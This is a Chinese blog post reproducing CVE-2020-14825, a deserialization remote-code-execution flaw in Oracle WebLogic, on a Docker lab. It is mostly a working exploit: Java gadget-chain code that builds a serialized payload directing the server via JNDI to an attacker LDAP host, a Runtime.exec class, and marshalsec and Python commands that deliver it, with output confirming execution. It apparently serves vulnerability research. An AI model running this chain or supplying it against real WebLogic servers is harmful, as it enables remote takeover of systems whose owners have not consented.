CVE-2020-14825:Weblogic反序列化漏洞复现

全程无图,全靠编
参考:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247486336&idx=1&sn=2a054ededbc855622fe2ac6c8906aae0&chksm=90392d70a74ea46635bef3cd4fc414cef87d16a1875ccb690f6eadb4304337e0d2b4772a2659&scene=126&sessionid=1603933645&key=7f54b3443b683033cfec95eb0ee90ba94d11eb5b3aab434add3c872b2a4b62efc0d19a1a2112aff162ea26e926805ccb6a713c43c9231e0ccf46d1d9f3433404132f9576fad66837df791bbb8b677919071577b6b30ef4bf9968dc85894ef22549430c09ab65462d773aa102320070fc261d8097abf7cb288e32cf563c0a0eea&ascene=1&uin=MjY5MDA0ODIwMA%3D%3D&devicetype=Windows+7+x64&version=6300002f&lang=zh_CN&exportkey=AUhACr%2BPzDbMNVNOHwvyEHQ%3D&pass_ticket=wqlCFAhHIF61mFoQzf8xbUdSBksKioTnQMGtR5C7T547%2BtC62Wwuxak%2Bz21orxmh&wx_header=0

环境

docker pull ismaleiva90/weblogic12
docker images
docker run -p7001:7001 84795663769d

POC

public class exp{
    // POC open calc
    public exp(){
        try {
            Runtime.getRuntime().exec("touch /tmp/ok14825.txt");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        exp e = new exp();
    }
}

找这些jar包真费劲

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import ysoserial.payloads.util.Reflections;

import java.io.*;
import java.util.PriorityQueue;

public class CVE_2020_14825 {
    public static void main(String[] args) throws Exception {
        MethodAttributeAccessor accessor = new MethodAttributeAccessor();
        accessor.setAttributeName("Timeline Sec");
        accessor.setIsWriteOnly(true);
        accessor.setGetMethodName("getDatabaseMetaData");

        LockVersionExtractor extractor = new LockVersionExtractor(accessor,"");

        JdbcRowSetImpl jdbcRowSet = Reflections.createWithoutConstructor(com.sun.rowset.JdbcRowSetImpl.class);
        jdbcRowSet.setDataSourceName("ldap://192.168.8.142:1389/#exp");

        PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(extractor));
        Reflections.setFieldValue(queue,"size",2);

        Object[] queueArray = (Object[])((Object[]) Reflections.getFieldValue(queue, "queue"));
        queueArray[0] = jdbcRowSet;

        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(new File("cve_2020_14825.ser")));
        out.writeObject(queue);
        out.flush();
        out.close();
//        readObject();
    }

    public static void readObject() {
        FileInputStream fis = null;
        try {
            fis = new FileInputStream("cve_2020_14825.ser");
            ObjectInputStream ois = new ObjectInputStream(fis);
            ois.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}


过程


编译exp.java

放在python -m SimpleHTTPServer 80

开启ladp服务


java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.8.142/#exp 1389



go


python weblogic_poc.py -u 192.168.8.142 -p 7001 -f cve_2020_14825.ser



结果


docker exec -i -t 84795663769d /bin/bash
[oracle@c6836c2a0308 base_domain]$ ls /tmp 
hsperfdata_oracle  ok14825.txt  wlstTemporacle



补一张图



						  
					  
						
							


						

							
							
			渗透测试							
						



						

						
						


						

						
					
					

					
					

						
相关

						

				
						
			

																
								

										
渗透测试(一)-Msf生成免杀后门(内网篇)

									
									

								 

        

								

							
							

																
								

										
渗透测试(二)-Metasploit生成免杀后门(外网篇)

									
									

								 

        

								

							
							

																
								

										
渗透测试之billu b0x2

									
									

								 

        

								

							
							

																
								

										
IPv6渗透测试工具

									
									

								 

        

								

							
							

																
								

										
渗透测试之劫持国外某云BucketName

									
									

								 

        

								

							
							

																
								

										
easy file sharing server渗透测试

									
									

								 

        

								

							
							

																
								

										
渗透测试实验二

									
									

								 

        

								

							
							

																
								

										
一次内网渗透测试实验过程

									
									

								 

        

								

							
							

																
								

										
10 渗透测试 穷举 02

									
									

								 

        

								

							
							

																
								

										
螣龙安科:内网渗透测试的重要性

									
									

								 

        

								

							
							

																
								

										
C/S架构的渗透测试-请求加解密及测试

									
									

								 

        

								

							
							

																
								

										
渗透测试之本地文件包含(LFI)

									
									

								 

        

								

							
							
            
            
            
                                    
           
  			
						

					

					
				

				

														
					
					

					
									

					
									   
标签

										

										
    
										

									

										
										

									

					

					
				


			
		
		
		
			


						





	

	
一品网 冀ICP备14022925号-6